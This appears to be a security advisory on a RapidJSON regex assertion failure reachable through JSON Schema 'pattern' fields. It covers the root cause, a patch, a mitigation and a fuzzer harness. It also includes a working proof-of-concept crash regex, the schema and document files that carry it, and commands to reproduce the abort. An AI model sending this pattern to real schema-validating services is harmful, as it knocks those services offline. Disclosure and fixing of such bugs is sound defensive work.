Summary
RapidJSON's internal regex engine (regex.h) hits an assertion failure in Eval() when processing malformed regular expressions from JSON Schema "pattern" fields. A crafted regex like ^s(}}}|)}}}}}}}}+ causes operand stack underflow, triggering assert(operandStack.GetSize() >= sizeof(Frag) * 2) at regex.h:381. Exploitable when an application validates JSON against untrusted schemas.
Root Cause
GenericRegex::Eval() at regex.h:381 assumes the operand stack holds at least 2 Frag entries when it processes an alternation (|). The regex compiler does not validate the pattern structure before evaluation, so syntactically invalid patterns are accepted without error and passed directly to the evaluator. A malformed regex that combines a group, an alternation operator, and stray closing braces leaves the operand stack with fewer entries than Eval() expects, and the assertion fails.
Vulnerable Code (regex.h:381)
template <typename Encoding, typename Allocator>
bool GenericRegex<Encoding, Allocator>::Eval(
    Stack<Allocator>& operandStack, Operator op) {
    // ...
    case kAlternation: {
        // Assumes 2 operands are available on the stack.
        // RAPIDJSON_ASSERT expands to assert() by default.
        RAPIDJSON_ASSERT(operandStack.GetSize() >= sizeof(Frag) * 2); // ASSERTION FAILURE
        Frag e2 = *operandStack.template Pop<Frag>(1);
        Frag e1 = *operandStack.template Pop<Frag>(1);
        // ...
    }
}
Trigger Pattern
Regex: ^s(}}}|)}}}}}}}}+
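The group "(}}}|)" contains an alternation whose right-hand branch is empty, and it
is followed by a run of unescaped closing braces and a + quantifier. The compiler
does not reject this input, so operands are consumed faster than they are pushed and
the stack holds fewer than two Frag entries when the alternation operator is evaluated.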
Vulnerability Description
RapidJSON's internal regex engine, used for JSON Schema "pattern" validation, does not properly validate regular expression syntax before evaluating the pattern. The Eval() function in GenericRegex processes operators assuming the operand stack is well-formed, with assert() guards protecting against stack underflow. When a malformed regex such as ^s(}}}|)}}}}}}}}+ is provided via a JSON Schema "pattern" field, the operand stack underflows during alternation processing, triggering the assertion at regex.h:381. This is exploitable in any application that validates JSON documents against untrusted or user-provided JSON Schemas. In web services accepting JSON Schema definitions, this becomes a network-exploitable denial of service (the attacker supplies a malicious schema, and any subsequent validation against it crashes the service).
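Until the library itself rejects such patterns, an application can keep a failed assertion from aborting the whole process. RapidJSON only supplies its default RAPIDJSON_ASSERT (plain assert()) when the macro is not already defined, so a service may define its own version before including any RapidJSON header. The sketch below shows that idea in isolation. RequireTwoOperands and TryCompile are hypothetical stand-ins so the example builds without RapidJSON installed; whether an exception propagates cleanly out of the affected code path in a given RapidJSON version is an assumption that should be tested.

```cpp
#include <cstddef>
#include <stdexcept>
#include <string>

// Must come before any RapidJSON include. Expression form, so it also
// works where the macro is used inside a larger expression.
#ifndef RAPIDJSON_ASSERT
#define RAPIDJSON_ASSERT(x) \
    ((x) ? (void)0 : throw std::runtime_error("RapidJSON assertion failed: " #x))
#endif

// In a real service the RapidJSON headers would be included here, e.g.
// #include <rapidjson/schema.h>

// Hypothetical stand-in for library code guarded by RAPIDJSON_ASSERT.
inline void RequireTwoOperands(std::size_t operandCount) {
    RAPIDJSON_ASSERT(operandCount >= 2);
}

// Hypothetical wrapper: reports the failure to the caller instead of
// letting the process abort.
inline bool TryCompile(std::size_t operandCount, std::string& error) {
    try {
        RequireTwoOperands(operandCount);
        return true;
    } catch (const std::runtime_error& e) {
        error = e.what();
        return false;
    }
}
```

In an actual validator the try block would wrap the construction of rapidjson::SchemaDocument from the untrusted schema, and a caught exception would be reported as a rejected schema.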
Severity
Medium (CVSS 5.5)
PoC
Production Reproduction
Production application: workspace/prod_repro/json_schema_validator.cpp, a JSON Schema validation service that uses only the public rapidjson::SchemaDocument and rapidjson::SchemaValidator API.
# Build
clang++ -fsanitize=address -g -O1 -I/path/to/rapidjson/include \
workspace/prod_repro/json_schema_validator.cpp -o json_schema_validator
# Run with crash input
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator crash-2d2aae10f939c969030c33c3289f2c4188642165
Standalone Reproduction
Also reproducible with standalone JSON files:
Schema (schema.json):
{"pattern":"^s(}}}|)}}}}}}}}+"}
Document (doc.json):
"hello"
# Run with the standalone files
ASAN_OPTIONS=detect_leaks=0 ./json_schema_validator schema.json doc.json
Sanitizer Output
Note: This is an assert() failure, not a memory error. The program calls abort() directly, so ASAN does not produce a stack trace. The assertion message and the Aborted exit status are the complete output.
json_schema_validator: /usr/include/rapidjson/internal/regex.h:381: bool rapidjson::internal::GenericRegex<rapidjson::UTF8<>>::Eval(Stack<Allocator> &, Operator) [Encoding = rapidjson::UTF8<>, Allocator = rapidjson::CrtAllocator]: Assertion `operandStack.GetSize() >= sizeof(Frag) * 2' failed.
Aborted (exit code 134)
Suggested Fix
--- a/include/rapidjson/internal/regex.h
+++ b/include/rapidjson/internal/regex.h
@@ -378,7 +378,8 @@ bool GenericRegex<Encoding, Allocator>::Eval(
         case kAlternation: {
-            RAPIDJSON_ASSERT(operandStack.GetSize() >= sizeof(Frag) * 2);
+            if (operandStack.GetSize() < sizeof(Frag) * 2)
+                return false; // Reject malformed regex instead of asserting
             Frag e2 = *operandStack.template Pop<Frag>(1);
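The effect of this change can be illustrated with a simplified, self-contained model. This is not RapidJSON's code: Frag here is a toy two-field struct, the operand stack is a std::vector, and EvalAlternation is a hypothetical name. The sketch only shows the control flow the patch aims for, where an underflow is reported to the caller rather than asserted.

```cpp
#include <vector>

// Toy stand-in for the engine's fragment type (not RapidJSON's Frag).
struct Frag {
    int start;
    int out;
};

// Pops two operands and pushes one merged fragment.
// Returns false and leaves the stack untouched when fewer than two
// operands are available, so the caller can mark the pattern invalid.
bool EvalAlternation(std::vector<Frag>& operands) {
    if (operands.size() < 2) {
        return false;  // malformed pattern: reject instead of asserting
    }
    Frag e2 = operands.back();
    operands.pop_back();
    Frag e1 = operands.back();
    operands.pop_back();
    // Toy merge rule, used only to make the result observable.
    operands.push_back(Frag{e1.start, e2.out});
    return true;
}
```

A caller that receives false would stop compiling the pattern and treat the regex as invalid, which is the behavior the patch relies on.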
Fuzzer Source Code
// rj_schema_fuzzer.cc — Fuzz rapidjson SchemaValidator
#include <cstdint>
#include <cstddef>
#include <string>
#include <rapidjson/document.h>
#include <rapidjson/schema.h>
#include <rapidjson/stringbuffer.h>
#include <rapidjson/error/en.h>
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    if (size < 4) return 0;
    size_t split = size / 2;
    const std::string schema_str(reinterpret_cast<const char*>(data), split);
    const std::string doc_str(reinterpret_cast<const char*>(data + split), size - split);
    rapidjson::Document schema_doc;
    if (schema_doc.Parse(schema_str.c_str()).HasParseError()) return 0;
    if (!schema_doc.IsObject()) return 0;
    rapidjson::SchemaDocument schema(schema_doc);
    rapidjson::Document doc;
    if (doc.Parse(doc_str.c_str()).HasParseError()) return 0;
    rapidjson::SchemaValidator validator(schema);
    if (!doc.Accept(validator)) {
        rapidjson::StringBuffer sb;
        validator.GetInvalidSchemaPointer().StringifyUriFragment(sb);
        (void)sb.GetString();
        sb.Clear();
        (void)validator.GetInvalidSchemaKeyword();
        validator.GetInvalidDocumentPointer().StringifyUriFragment(sb);
        (void)sb.GetString();
    }
    validator.Reset();
    doc.Accept(validator);
    return 0;
}